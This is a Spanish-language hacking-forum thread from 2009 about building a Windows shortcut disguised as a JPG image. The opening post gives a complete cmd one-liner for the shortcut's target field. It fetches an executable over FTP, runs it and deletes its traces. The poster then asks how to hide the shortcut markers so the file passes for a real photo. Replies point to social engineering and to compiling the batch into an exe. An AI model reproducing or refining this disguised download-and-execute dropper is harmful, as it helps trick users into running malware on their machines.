elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía actualizada para evitar que un ransomware ataque tu empresa


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  Ejecutar comandos cmd desde un Acceso Directo en Windows
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Ejecutar comandos cmd desde un Acceso Directo en Windows  (Leído 19,271 veces)
ikary

Desconectado Desconectado

Mensajes: 127


Ver Perfil
Ejecutar comandos cmd desde un Acceso Directo en Windows
« en: 7 Noviembre 2009, 05:44 am »

Saludos

LLevo tiempo dandole vueltas al modo de ejecutar codigo desde un archivo .JPG o .TXT

E estado leyendo mucho y Googleando mas y por lo que e visto e llegado a la conclusion de que NO SE PUEDE, (o quizas no e buscado suficiente).

El hecho es que investigando ya por mi cuenta, me di cuenta que desde un acceso directo .JPG por ejemplo, se puede redirigir la ruta hacia donde queramos (incluso un .EXE) y el acceso directo sigue manteniendo su extension .JPG (ademas de la extension oculta .lnk).

Hasta el momento lo unico que e conseguido es abrir una cmd, conectarse a un servidor ftp, descargar un fichero, ejecutarlo y borrar huellas desde un Acceso Directo con extension .JPG.lnk.

El codigo que use dentro del campo Destino del AD fue este:
Código:
%windir%\system32\cmd.exe /k echo get archivo.exe>>ftp.txt && echo quit>>ftp.txt && ftp -A -s:ftp.txt 127.0.0.1 && start archivo.exe && del ftp.txt

Simplemente y a modo de prueba, el acceso directo accede al cmd.exe local, crea un fichero ftp.txt que usara el cliente ftp para conectarse, se conecta, descarga el archivo "archivo.exe" y lo ejecuta.

Ahora los problemas son:

1- El Acceso Directo debe permanecer siempre en el mismo ordenador que el archivo original. Me explico: Si metemos el acceso directo en un .rar, el winrar lo convierte a un .exe, y si enviamos el acceso directo a otra maquina, tambien la reconoce como .exe.
    Sin embargo, si metemos en un .rar el acceso directo y el archivo original, este conservará su extension .jpg.lnk. E igualmete pasa al enviarlo.

2- El Acceso Directo al crearse se le añade una etiqueta con la flechita predeterminada de Acceso Directo en la esquina inferior izquierda, dando una señal de que no es una foto original, sino algo extraño.
    E intentado con varios programas editar los atributos del archivo, pero mas tarde me di cuenta de que esa "flechita" se pone automaticamente por una entrada del registro de Windows.   
    Esta entrada se puede modificar en la maquina local, pero al pasar el fichero a otra maquina, esta le coloca la "flechita" otra vez ...logico  ;-)

3- Ademas de la "flechita", el archivo por ser un AD, se le añade un grande y claro atributo de "Acceso directo" debajo del nombre del archivo.

4- E intentado modificar las propiedades del fichero mediante programas expecificos para ello, pero como es logico, toman al Acceso directo como si fuese una cmd.exe, por lo tanto estaria modificando el archivo equivocado  >:(

Ahora mi pregunta es: ¿Hay alguna forma de modificar ese fichero para que sea (de alguna forma) invisible los atributos de Acceso directo?. ¿O alguna idea u opinion al respecto?

Bueno, desde ya, muchas gracias.

Un saludo. Ikary
En línea

ikary

Desconectado Desconectado

Mensajes: 127


Ver Perfil
Re: Ejecutar comandos cmd desde un Acceso Directo en Windows
« Respuesta #1 en: 8 Noviembre 2009, 20:03 pm »

Estoy dando palos de ciego con este tema verdad?
En línea

kamsky
Colaborador
***
Desconectado Desconectado

Mensajes: 2.218


Como no sabían que era imposible, lo hicieron...


Ver Perfil
Re: Ejecutar comandos cmd desde un Acceso Directo en Windows
« Respuesta #2 en: 8 Noviembre 2009, 21:09 pm »

a ver si te sirve: http://lecciones.batiburrillo.net/2009/10/01/ejecutar-un-comando-de-sistema-desde-una-acceso-directo.htm
En línea

----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---

                       hack 4 free!!
ikary

Desconectado Desconectado

Mensajes: 127


Ver Perfil
Re: Ejecutar comandos cmd desde un Acceso Directo en Windows
« Respuesta #3 en: 8 Noviembre 2009, 23:09 pm »

Bueno, gracias por contestar pero...
No leiste el post completo verdad?   :P

La pregunta era si se podia, de alguna forma, quitar el "simbolo de la flechita" de acceso directo de Windows.
En línea

kamsky
Colaborador
***
Desconectado Desconectado

Mensajes: 2.218


Como no sabían que era imposible, lo hicieron...


Ver Perfil
Re: Ejecutar comandos cmd desde un Acceso Directo en Windows
« Respuesta #4 en: 8 Noviembre 2009, 23:24 pm »

 :silbar: :silbar: perdón no lei bien

quizás esto??:
http://www.fermu.com/content/view/66/26/lang,es/
En línea

----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---

                       hack 4 free!!
ikary

Desconectado Desconectado

Mensajes: 127


Ver Perfil
Re: Ejecutar comandos cmd desde un Acceso Directo en Windows
« Respuesta #5 en: 8 Noviembre 2009, 23:53 pm »

Eso tambien lo ponia en mi post...

me di cuenta de que esa "flechita" se pone automaticamente por una entrada del registro de Windows.  
    Esta entrada se puede modificar en la maquina local, pero al pasar el fichero a otra maquina, esta le coloca la "flechita" otra vez ...logico  ;-)


Ahora mi pregunta es: ¿Hay alguna forma de modificar ese fichero para que sea (de alguna forma) invisible los atributos de Acceso directo?. ¿O alguna idea u opinion al respecto?


De todas formas creo que no tiene solucion mi pregunta XDDD

Gracias igualmente por contestar  :D
« Última modificación: 9 Noviembre 2009, 00:03 am por ikary » En línea

kamsky
Colaborador
***
Desconectado Desconectado

Mensajes: 2.218


Como no sabían que era imposible, lo hicieron...


Ver Perfil
Re: Ejecutar comandos cmd desde un Acceso Directo en Windows
« Respuesta #6 en: 9 Noviembre 2009, 00:00 am »

pero igual que lo modificas en local, lo puedes modificar en remoto... sólo tienes que echarle un poco de imaginación y un poquito de ingeniería social
En línea

----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---

                       hack 4 free!!
Castg!
Wiki

Desconectado Desconectado

Mensajes: 1.191



Ver Perfil WWW
Re: Ejecutar comandos cmd desde un Acceso Directo en Windows
« Respuesta #7 en: 12 Noviembre 2009, 21:06 pm »

podrias agregar un reg del a tu codigo, o sino ya fue, hacete un exe. es mucho mas practico  ;-) . te recomiendo el quick batch file compiler.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines